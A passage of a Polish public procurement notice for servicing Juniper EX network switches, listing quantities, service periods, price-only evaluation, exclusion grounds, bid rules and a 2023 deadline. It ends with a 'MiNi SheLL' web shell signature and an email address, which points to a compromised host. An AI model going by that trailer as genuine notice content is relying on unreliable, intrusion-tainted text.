Warszawa,<br/>3) Grupa 2: EX3300-48T – liczba sztuk 26, lokalizacja Warszawa,<br/>4) Grupa 2: EX3400-24T – liczba sztuk 1, lokalizacja Warszawa,<br/>5) Grupa 2: EX3400-48P – liczba sztuk 6, lokalizacja Warszawa,<br/>6) Grupa 2: EX3400-48T – liczba sztuk 4, lokalizacja Warszawa, Białystok,<br/>7) Grupa 2: EX4300-24T – liczba sztuk 2, lokalizacja Warszawa, <br/>8) Grupa 2: EX4300-48T – liczba sztuk 4, lokalizacja Warszawa, <br/>9) Grupa 2: karta EX-UM-4X4SFP do EX4300– liczba sztuk 1, lokalizacja Warszawa,<br/>10) Grupa 3: EX3300-24P – liczba sztuk 2, lokalizacja Warszawa,<br/>11) Grupa 3: EX3300-24T – liczba sztuk 1, lokalizacja Warszawa,<br/>12) Grupa 3: EX3300-48P – liczba sztuk 7, lokalizacja Warszawa,<br/>13) Grupa 3: EX3300-48T – liczba sztuk 7, lokalizacja Warszawa,<br/>14) Grupa 4: EX3400-48P – liczba sztuk 1, lokalizacja Warszawa,<br/>3. Konfiguracje Urządzeń, o których mowa w ust. 2 powyżej oraz w Rozdziale III ust.5 SWZ, okres świadczenia oraz numery seryjne podane są w punkcie C w Załączniku nr 1b do SWZ-SOPZ dla Części 2.<br/>4.	Szczegółowy opis przedmiotu zamówienia (zwany jako SOPZ) zawarty jest w Załączniku nr 1b do SWZ dla Części 2.<br/>5.	W przypadkach, kiedy w szczegółowym opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty, pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę co prowadziłoby do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń i jest to uzasadnione specyfiką przedmiotu zamówienia. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty, pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”.<br/>6.	W przypadku, gdy w opisie przedmiotu zamówienia zostały zastosowane odniesienia do norm, ocen technicznych, specyfikacji technicznych i systemów referencyjnych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza zastosowanie rozwiązań równoważnych. Każdorazowo gdy wskazana jest w niniejszej SWZ norma, ocena techniczna, specyfikacja techniczna lub system referencji technicznych należy przyjąć, że w odniesieniu do nich użyto sformułowania „lub równoważne”.<br/>7.	Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego, jest obowiązany udowodnić w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp, że proponowane przez niego rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. Dowody, w szczególności przedmiotowe środki dowodowe, o których mowa w art. 104-107 ustawy Pzp, potwierdzające, że proponowane przez Wykonawcę rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia nie podlegają uzupełnieniu.<br/>8.	Zamawiający nie dopuszcza możliwości prowadzenia negocjacji w celu ulepszenia treści ofert złożonych w odpowiedzi na ogłoszenie o zamówieniu.<br/>9. Termin realizacji zamówienia w zakresie Części 2: Realizacja przedmiotu zamówienia nastąpi od dat określonych poniżej:<br/>1)	Grupa 1, pozycja 1: EX4200-24T: od 17.07.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 16.07.2024 w zakresie Serwisu Urządzeń;<br/>2)	Grupa 2, pozycja 2: EX3300-48P: od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 9.09.2024 w zakresie Serwisu Urządzeń;<br/>3)	Grupa 2, pozycja 3: EX3300-48T : od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 9.09.2024 w zakresie Serwisu Urządzeń;<br/>4)	Grupa 2, pozycja 4: EX3400-24T : od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 9.09.2024;<br/>5)	Grupa 2, pozycja 5: EX3400-48P: od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 9.09.2024;<br/>6)	Grupa 2, pozycja 6: EX3400-48T: od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 9.09.2024;<br/>7)	Grupa 2, pozycja 7: EX4300-24T: od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 9.09.2024;<br/>8)	Grupa 2, pozycja 8: EX4300-48T: od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 9.09.2024;<br/>9)	Grupa 2, pozycja 9: karta EX-UM-4X4SFP: od 10.09.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 9.09.2024;<br/>10)	Grupa 3, pozycja 10: EX3300-24P: od 3.10.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 2.10.2024 w zakresie Serwisu Urządzeń;<br/>11)	Grupa 3, pozycja 11: EX3300-24T: od 3.10.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 2.10.2024 w zakresie Serwisu Urządzeń;<br/>12)	Grupa 3, pozycja 12: EX3300-48P: od 3.10.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 2.10.2024 w zakresie Serwisu Urządzeń;<br/>13)	Grupa 3, pozycja 13: EX3300-48T: od 3.10.2022 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 30.06.2024 w zakresie Serwisu Oprogramowania oraz do 2.10.2023 w zakresie Serwisu Urządzeń;<br/>14)	Grupa 4, pozycja 14: EX3400-48P: od 8.11.2023 albo od daty zawarcia Umowy z Wykonawcą, zależnie od tego, która z tych dat przypadnie później - do 7.11.2024.<br/>10. Zamawiający w zakresie Części 2 stosownie do art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. Kodeks pracy w wymiarze czasu adekwatnym do SWZ powierzonych zadań, osób (osoby wykonujące czynności przyjmowania i rejestracja zgłoszeń Awarii, o których mowa w § 5 ust.4 Załącznika nr 5b do SWZ-wzoru umowy dla Części 2 tj.:) wykonujących czynności wskazane we Wzorze umowy, stanowiącym Załącznik nr 5b do SWZ dla Części 2, dalej zwany „Wzorem umowy”, czynności w zakresie realizacji zamówienia i bezpośrednio związanych z wykonywaniem zamówienia, z uwzględnieniem minimalnego wynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz.U. 2022 poz. 2207 z późn. zm.), przez cały okres realizacji zamówienia.<br/>11. Sposób weryfikowania zatrudnienia osób, o których mowa w art. 95 ust. 1 ustawy Pzp, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we Wzorze Umowy w § 5 pt.: „Personel Wykonawcy”.<br/>12.Zamawiający nie przewiduje możliwości udzielenia zamówienia, o którym mowa w art. 305 pkt 1) w zw. z art. 214 ust. 1 pkt 7) ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72710000-0 - Usługi w zakresie lokalnej sieci komputerowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-07</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonując wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu, złożonych w odpowiedzi na ogłoszenie o zamówieniu, będzie kierował się kryterium i jego znaczeniem oraz będzie oceniał oferty w ramach kryterium oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego Oferta uzyska najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenie braku podstaw wykluczenia z postępowania Wykonawca składa na wezwanie Zamawiającego, o którym mowa w Rozdziale VIII ust.3 SWZ:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1) dokumentu, o którym mowa w ust. 1 pkt 1) składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani<br/>nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury.<br/>2) dokument, o którym mowa w ust. 1 pkt 1) powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1),lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w tym punkcie, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed<br/>organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania wykonawcy. Postanowienie pkt 2) stosuje się</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Ofertę stanowi:<br/>1)	Formularz Ofertowy dla Części 1 i 2 (wzór stanowi Załącznik nr 2 do SWZ);<br/>2)	Formularz cenowy dla Części 2 (wzór stanowi Załącznik nr 3 do SWZ).<br/>2.	Wraz z ofertą należy złożyć:<br/>1)	Oświadczenie o braku podstaw do wykluczenia (wzór stanowi Załącznik nr 4 do SWZ);<br/>2)	Pełnomocnictwo wskazujące pełnomocnika Wykonawców występujących wspólnie (w przypadku złożenia oferty przez konsorcjum);<br/>3)	Pełnomocnictwo do podpisania oferty (w przypadku posługiwania się pełnomocnikiem);<br/>4)	Dowody, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp, potwierdzające, że proponowane przez Wykonawcę rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia (w przypadku zaoferowania rozwiązań równoważnych). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem. Pełnomocnictwo powinno być załączone do oferty.<br/>4.	Żaden z Wykonawców występujących wspólnie (członek konsorcjum) nie może podlegać wykluczeniu z postępowania. <br/>5.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>6.	W przypadku, gdy najwyżej zostanie oceniona oferta złożona przez Wykonawców występujących wspólnie, a także gdy Zamawiający skorzysta z uprawnienia o którym mowa w art. 274 ust. 1 ustawy Pzp, każdy z Wykonawców przedstawia podmiotowe środki dowodowe służące potwierdzeniu braku podstaw do wykluczenia. Pozostałe podmiotowe środki dowodowe mogą być złożone wspólnie.<br/>7.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>8.	Wykonawcy, którzy złożyli ofertę wspólną odpowiadają solidarnie za realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowie w zakresie Części 1 zostały określone w § 10 Załącznika nr 5a do SWZ-wzorze Umowy dla Części 1 a w zakresie Części 2 w § 14 Załącznika nr 5b do SWZ-wzorze Umowy dla Części 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://nask.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zgodnie z art. 222 ust. 4 ustawy Pzp Zamawiający informuje, że kwota jaką zamierza przeznaczyć na sfinansowanie zamówienia w zakresie Części 1 i 2 wynosi: 172 200,00 złotych brutto, w tym:<br/>Dla części 1 wynosi: 49 200,00 złotych brutto;<br/>Dla Części 2 wynosi: 123 000,00 złotych brutto.<br/>2. Na podstawie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835), zwana dalej „ustawa sankcyjna”, osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>3	Na podstawie art. 7 ust. 5 ustawy sankcyjnej przez ubieganie się o udzielenie zamówienia publicznego rozumie się, złożenie oferty.<br/>4. Zamawiający dopuszcza udział podwykonawców w realizacji zamówienia. Powierzenie realizacji części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za prawidłową realizację zamówienia.<br/>5.	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie zamierza powierzyć ewentualnym podwykonawcom i podania przez Wykonawcę firm podwykonawców, o ile są już znani.<br/>6. Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zostały określone w Rozdziale VIII ust. 5 SWZ.<br/>7. Wykluczeniu z postępowania podlega Wykonawca, wobec którego zachodzą okoliczności określone w:<br/>1)	art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4) - 10) ustawy Pzp;<br/>2)	art. 7 ust. 1 ustawy sankcyjnej.

Creat By MiNi SheLL
Email: jattceo@gmail.com